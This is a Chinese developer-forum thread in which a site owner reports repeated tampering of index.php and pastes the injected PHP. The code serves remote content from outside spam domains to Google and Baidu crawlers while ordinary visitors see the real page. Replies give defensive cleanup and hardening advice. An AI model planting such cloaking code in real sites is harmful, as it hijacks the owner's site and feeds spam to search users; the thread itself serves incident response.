开发者社区> 问答> 正文

网站受到攻击,index.php被篡改

华信教育 2017-04-24 16:04:22 6079
近期发现我的网站在百度收录出现好多无关广告,进入ftp后发现index.php被篡改,我改回后隔天有被更改,该怎么办呢?


这些广告 标题后面都带“百度 知道”



index.php2次被更改的代码:
<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false)
{
   $file = file_get_contents('http://www.asttgw.loan/app/');
   echo $file;
}
else
{
include 'index2.php';
   exit();
}
?>


————————————————————————————————


<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'baidu')!==false)
{
   $file = file_get_contents('http://www.hwklq.pw:888/kq/');
   echo $file;//
}
PHP
分享到
取消 提交回答
全部回答(4)
  • 玩站网
    2018-10-26 11:43:43
    php开源程序,很多目前面临比较严峻的安全问题。
    主要原因是你网站有漏洞、或者服务器有漏洞,被人家安装了后门。


    处理方法:
    1、入口白名单,只允许白名单入口访问, 屏蔽其他入口,防止人家恶意上传php脚本来执行。
    2、清理服务器内部挂马代码,清理程序内的挂马的内容。
    3、修复程序漏洞、服务器漏洞等。
    4、可以通过cdn等方式,隐藏服务器真实ip地址
    0 0
  • 网站安全
    2018-10-26 09:39:25
    Re网站受到攻击,index.php被篡改
    网站首页反复被篡改说明你网站程序有漏洞导致被上传了脚本后门木马.
    处理方法:先把可疑的文件 查看下修改时间 对比下 自己本地的备份文件 是否有  多余的文件 如果有的话就删除,再看下首页有无被修改 有的话就用备份替换上传  上去,但只能解决一时 还是会被反复篡改,治标不治本,如果对程序代码不熟悉的 话建议找
    专业做网站安全公司来处理此问题,国内推荐Sinesafe,绿盟,启明星辰等等
    0 0
  • 北方汽修
    2017-08-23 16:07:54
    Re网站受到攻击,index.php被篡改
    请问楼主你的问题解决了吗,你用的什么系统,我用的DEDE 的后台,跟你的情况一样,都 有一段时间了,一直解决不了,
    0 0
  • 梦丫头
    2017-04-24 17:57:33
    看看有否漏洞?程序有补丁没,如果没补丁建议加固下服务器了
    0 0
添加回答

集结各类场景实战经验,助你开发运维畅行无忧

推荐文章
相似问题
推荐课程